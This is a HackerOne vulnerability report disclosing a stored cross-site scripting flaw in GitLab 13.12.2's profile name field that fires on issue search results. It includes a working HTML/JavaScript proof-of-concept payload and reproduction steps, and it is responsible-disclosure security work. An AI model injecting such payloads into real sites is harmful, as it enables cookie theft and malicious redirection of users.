Stored XSS in Full name when performing a search (without bypass csp)
HackerOne report #1218156 by solov9ev on 2021-06-05, assigned to @ankelly:
Report | Attachments | How To Reproduce
Report
Summary
Hi, Security Team!
I discovered a stored xss vulnerability without bypass csp when a user searches for information.
Steps to reproduce
-
Run Gitlab
docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest(GitLab Community Edition 13.12.2) -
Go to
/-/profileand insert the following malicious payload:1337<iframe srcdoc="<h1 onmouseover=prompt()><a href=javascript:alert()>click me</a>"></iframe>
- Create a issue:
My new Issue
- Go to
/search?utf8=✓&search=My+new+&group_id=&project_id=2&scope=issues&search_code=false&snippets=false&repository_ref=&nav_source=navbar
Impact
With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- _________________2021-06-05_17-56-16.png
- _________________2021-06-05_17-58-05.png
- _________________2021-06-05_17-59-01.png
- _________________2021-06-05_17-59-16.png
How To Reproduce
Please add reproducibility information to this section: